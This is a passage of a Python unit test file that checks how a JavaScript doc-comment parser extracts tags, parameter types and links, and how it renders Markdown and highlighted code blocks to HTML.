self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "protected")
self.assertEqual(parsed.comments[0].text, "jQuery JavaScript Library v@VERSION\nhttp://jquery.com/\n\nCopyright 2011, John Resig\nDual licensed under the MIT or GPL Version 2 licenses.\nhttp://jquery.org/license\n\nIncludes Sizzle.js\nhttp://sizzlejs.com/\nCopyright 2011, The Dojo Foundation\nReleased under the MIT, BSD, and GPL Licenses.\n\nDate: @DATE")
#
# ATTACHMENT
#
def test_missing_node(self):
parsed = self.process('''
/** Root Doc */
core.Class("xxx", {
members : {
foo : function() {
/** TODO */
}
}
/** END */
})
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].text, "Root Doc")
#
# DOC COMMENTS
#
def test_doc(self):
parsed = self.process('''
/** Doc Comment */
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_unbound(self):
parsed = self.process('''
/** Doc Comment */
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "doc")
self.assertEqual(parsed.comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed.comments[0].text, "Doc Comment")
def test_doc_unbound_nobreak(self):
parsed = self.process('''/** Doc Comment */''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "doc")
self.assertEqual(parsed.comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed.comments[0].text, "Doc Comment")
def test_doc_multiline(self):
parsed = self.process('''
/**
* Doc Comment
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_multiline_three(self):
parsed = self.process('''
/**
* Doc Comment Line 1
* Doc Comment Line 2
* Doc Comment Line 3
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3")
def test_doc_multiline_clean(self):
parsed = self.process('''
/**
Doc Comment
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_multiline_clean_three(self):
parsed = self.process('''
/**
Doc Comment Line 1
Doc Comment Line 2
Doc Comment Line 3
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3")
#
# DOC COMMENTS :: RETURN
#
def test_doc_return(self):
parsed = self.process('''
/**
* {Number} Returns the sum of x and y.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Returns the sum of x and y.</p>\n")
self.assertEqual(comment.text, "Returns the sum of x and y.")
self.assertEqual(comment.returns[0]["name"], "Number")
def test_doc_return_twotypes(self):
parsed = self.process('''
/**
* {Number | String} Returns the sum of x and y.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Returns the sum of x and y.</p>\n")
self.assertEqual(comment.text, "Returns the sum of x and y.")
self.assertEqual(comment.returns[0]["name"], "Number")
self.assertEqual(comment.returns[1]["name"], "String")
#
# DOC COMMENTS :: TAGS
#
def test_doc_tags(self):
parsed = self.process('''
/**
* Hello World
*
* #deprecated #public #use(future) #use(current)
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Hello World</p>\n")
self.assertEqual(comment.text, "Hello World")
self.assertEqual(comment.tags["deprecated"], True)
self.assertEqual(comment.tags["public"], True)
self.assertEqual(type(comment.tags["use"]), set)
self.assertIn("future", comment.tags["use"])
self.assertIn("current", comment.tags["use"])
self.assertNotIn("xxx", comment.tags["use"])
def test_doc_tags_clean(self):
parsed = self.process('''
/**
* #deprecated #public #use(future) #use(current)
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.text, "")
self.assertEqual(comment.tags["deprecated"], True)
self.assertEqual(comment.tags["public"], True)
self.assertEqual(type(comment.tags["use"]), set)
self.assertIn("future", comment.tags["use"])
self.assertIn("current", comment.tags["use"])
self.assertNotIn("xxx", comment.tags["use"])
#
# DOC COMMENTS :: LINKS
#
def test_doc_links(self):
parsed = self.process('''
/**
* Link to cool {z.core.Style} class. Looks at this method {core.io.Asset#toUri} to translate local
* asset IDs to something usable in the browser.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Link to cool <a href="#z.core.Style"><code>z.core.Style</code></a> class. Looks at this method <a href="#core.io.Asset~toUri"><code>core.io.Asset#toUri</code></a> to translate local\nasset IDs to something usable in the browser.</p>\n')
self.assertEqual(comment.text, 'Link to cool z.core.Style class. Looks at this method core.io.Asset#toUri to translate local\nasset IDs to something usable in the browser.')
def test_doc_links_primitive(self):
parsed = self.process('''
/**
* You can either use {String} or {Map} types as primitive data types.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>You can either use <a href="#String"><code>String</code></a> or <a href="#Map"><code>Map</code></a> types as primitive data types.</p>\n')
self.assertEqual(comment.text, 'You can either use String or Map types as primitive data types.')
def test_doc_links_type(self):
parsed = self.process('''
/**
* Just execute the {member:#update} method to fire the event {event:#update}.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Just execute the <a href="#member:~update"><code>update</code></a> method to fire the event <a href="#event:~update"><code>update</code></a>.</p>\n')
self.assertEqual(comment.text, 'Just execute the update method to fire the event update.')
def test_doc_links_object_alike(self):
parsed = self.process('''
/**
* {event:foo} an foo event that looks like a json structure.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p><a href="#foo"><code>foo</code></a> an foo event that looks like a json structure.</p>\n')
self.assertEqual(comment.text, 'foo an foo event that looks like a json structure.')
#
# DOC COMMENTS :: Code Blocks
#
def test_doc_links_in_code_block(self):
parsed = self.process('''
/**
* Foo event example code:
*
* var e = {event:foo};
* var e = {};
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Foo event example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="p">{</span><span class="nx">event</span><span class="o">:</span><span class="nx">foo</span><span class="p">};</span>\n<span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="p">{};</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Foo event example code:\n\n var e = {event:foo};\n var e = {};')
def test_doc_params_in_code_block(self):
parsed = self.process('''
/**
* Email example code:
*
* var foo = 'hello@bla.org';
* var test = "foo@blub.net";
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Email example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">foo</span> <span class="o">=</span> <span class="s1">\'hello@bla.org\'</span><span class="p">;</span>\n<span class="kd">var</span> <span class="nx">test</span> <span class="o">=</span> <span class="s2">"foo@blub.net"</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Email example code:\n\n var foo = \'hello@bla.org\';\n var test = "foo@blub.net";')
def test_multi_code_blocks(self):
parsed = self.process('''
/**
* Some code example:
*
* // A code block with empty lines in it
*
* if (true) {
*
* } else {
*
* }
*
* Another code block:
*
* console.log('Hello World');
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3\n4\n5\n6\n7</pre></div></td><td class="code"><div class="highlight"><pre><span class="c1">// A code block with empty lines in it</span>\n\n<span class="k">if</span> <span class="p">(</span><span class="kc">true</span><span class="p">)</span> <span class="p">{</span>\n\n<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>\n\n<span class="p">}</span>\n</pre></div>\n</td></tr></table>\n<p>Another code block:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">\'Hello World\'</span><span class="p">);</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Some code example:\n\n // A code block with empty lines in it\n\n if (true) {\n\n } else {\n\n }\n\nAnother code block:\n\n console.log(\'Hello World\');')
def test_code_blocks_in_list(self):
self.maxDiff = None
parsed = self.process('''
/**
* Some code:
*
* var e = 1;
*
* A list of things below:
*
* - __listItem__
*
* This is text and not code.
*
* // Some code
* console.log("This actually is code in the list")
*
* - __anotherListItem__
*
* More text.
*
* console.log("More code")
*
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Some code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n<p>A list of things below:</p>\n\n<ul>\n<li><p><strong>listItem</strong></p>\n\n<p>This is text and not code.</p></li>\n</ul>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre> <span class="c1">// Some code</span>\n <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"This actually is code in the list"</span><span class="p">)</span>\n</pre></div>\n</td></tr></table>\n<ul>\n<li><p><strong>anotherListItem</strong></p>\n\n<p>More text.</p></li>\n</ul>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"More code"</span><span class="p">)</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Some code:\n\n var e = 1;\n\nA list of things below:\n\n - __listItem__\n\n This is text and not code.\n\n // Some code\n console.log("This actually is code in the list")\n\n- __anotherListItem__\n\n More text.\n\n console.log("More code")')
#
# DOC COMMENTS :: PARAMS
#
def test_doc_params(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {Number} is bigger than @y {Number}. The optional @cache {Boolean?false} controls whether caching should be enabled.
* Also see @extra {String | Array ?} which is normally pretty useless
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>. The optional <code class="param">cache</code> controls whether caching should be enabled.\nAlso see <code class="param">extra</code> which is normally pretty useless</p>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y. The optional cache controls whether caching should be enabled.\nAlso see extra which is normally pretty useless')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "Array")
self.assertEqual(comment.params["cache"]["type"][0]["builtin"], True)
self.assertEqual(comment.params["extra"]["type"][0]["builtin"], True)
self.assertEqual(comment.params["extra"]["type"][1]["builtin"], True)
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertIn("optional", comment.params["cache"])
self.assertIn("optional", comment.params["extra"])
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_dynamic(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number...} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_dynamic_default(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number...?0} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][0]["builtin"], True)
self.assertTrue(comment.params["number"]["optional"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertEqual(comment.params["number"]["default"], "0")
def test_doc_params_dynamic_multi(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number|Integer...} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][1]["name"], "Integer")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_dynamic_multi_spacey(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number | Integer ... } parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][1]["name"], "Integer")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_namespaced(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {core.Number} is bigger than @y {core.Number}. The optional @cache {core.Boolean?false} controls whether caching should be enabled.
* Also see @extra {core.String | core.Array ?} which is normally pretty useless
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>. The optional <code class="param">cache</code> controls whether caching should be enabled.\nAlso see <code class="param">extra</code> which is normally pretty useless</p>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y. The optional cache controls whether caching should be enabled.\nAlso see extra which is normally pretty useless')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "core.Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "core.Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "core.Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "core.String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "core.Array")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["cache"]["optional"], True)
self.assertEqual(comment.params["extra"]["optional"], True)
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_lazytypes(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x is bigger than @y.
*
* Parameters:
*
* - @x {Number}
* - @y {Number}
* - @cache {Boolean?false}
* - @extra {String | Array ?}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n<li><code class="param">cache</code></li>\n<li><code class="param">extra</code></li>\n</ul>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y.\n\nParameters:\n\n- x\n- y\n- cache\n- extra')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "Array")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["cache"]["optional"], True)
self.assertEqual(comment.params["extra"]["optional"], True)
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_firstloose(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {String ? 13} is bigger than @y.
*
* Parameters:
*
* - @x {Number}
* - @y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '''<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n</ul>\n''')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
def test_doc_params_firstwin(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {Number ? 13} is bigger than @y.
*
* Parameters:
*
* - @x
* - @y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertTrue(comment.params["x"]["optional"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["x"]["default"], "13")
self.assertNotIn("default", comment.params["y"])
def test_doc_params_maps(self):
parsed = self.process('''
/**
* Additional arguments can be passed in via @options {Object?}:
*
* - @options.x {String}
* - @options.y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Additional arguments can be passed in via <code class="param">options</code>:</p>\n\n<ul>\n<li><code class="param">options.x</code></li>\n<li><code class="param">options.y</code></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["options"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]), dict)
self.assertEqual(comment.params["options"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["y"]["type"][0]["name"], "Number")
def test_doc_params_maps_multi_levels(self):
parsed = self.process('''
/**
* Additional arguments can be passed in via @options {Object?}:
*
* - @options {Object}
*
* - @options.x {String}
* - @options.y {Number}
*
* - @options.foo {Object}
*
* - @options.foo.x {String}
* - @options.foo.y {Number}
*
*/
''')
self.assertEqual(parsed.type, "script")
self.assertIsInstance(parsed.comments, list)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Additional arguments can be passed in via <code class="param">options</code>:</p>\n\n<ul>\n<li><p><code class="param">options</code></p>\n\n<ul>\n<li><code class="param">options.x</code></li>\n<li><code class="param">options.y</code></li>\n<li><code class="param">options.foo</code></li>\n<li><code class="param">options.foo.x</code></li>\n<li><code class="param">options.foo.y</code></li>\n</ul></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["options"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]), dict)
self.assertEqual(comment.params["options"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["y"]["type"][0]["name"], "Number")
self.assertEqual(type(comment.params["options"]["fields"]["foo"]), dict)
self.assertEqual(comment.params["options"]["fields"]["foo"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["foo"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["foo"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["foo"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["foo"]["fields"]["y"]["type"][0]["name"], "Number")
#
# DOC COMMENTS :: MARKDOWN
#
def test_doc_markdown_formatting(self):
parsed = self.process('''
/**
* This is some **important** text about *Jasy*.
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>This is some <strong>important</strong> text about <em>Jasy</em>.</p>\n")
def test_doc_markdown_quote(self):
parsed = self.process('''
/**
* Items:
*
* - Data
*
* > This is a block quote
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Items:</p>\n\n<ul>\n<li><p>Data</p>\n\n<blockquote>\n<p>This is a block quote</p>\n</blockquote></li>\n</ul>\n")
def test_doc_markdown_smartypants(self):
parsed = self.process('''
/**
* Text formatting with 'quotes' is pretty nice, too...
*
* It possible to use "different styles" here -- to improve clarity.
*
* Still it keeps code like `this.foo()` intact.
*
* It's also capable of detecting these things: "Joe's Restaurant".
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertIsInstance(parsed[0].comments, list)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Text formatting with 'quotes' is pretty nice, too…</p>\n\n<p>It possible to use “different styles” here – to improve clarity.</p>\n\n<p>Still it keeps code like <code>this.foo()</code> intact.</p>\n\n<p>It's also capable of detecting these things: “Joe's Restaurant”.</p>\n")
def test_doc_markdown_formatting_code(self):
parsed = self.process('''
/**
* This is some example code:
*
* var name = 'jasy';
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>This is some example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">name</span> <span class="o">=</span> <span class="s1">\'jasy\'</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n')
#
# DOC COMMENTS :: CODE
#
def test_doc_markdown_code(self):
parsed = self.process('''
/**
* Some code example:
*
* if (this.isEnabled()) {
* self.callCommand("reload", true);
* }
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3</pre></div></td><td class="code"><div class="highlight"><pre><span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">isEnabled</span><span class="p">())</span> <span class="p">{</span>\n <span class="nx">self</span><span class="p">.</span><span class="nx">callCommand</span><span class="p">(</span><span class="s2">"reload"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>\n<span class="p">}</span>\n</pre></div>\n</td></tr></table>\n')
def test_doc_markdown_code_single_blockquote(self):
parsed = self.process('''
/**
* Some code example:
*
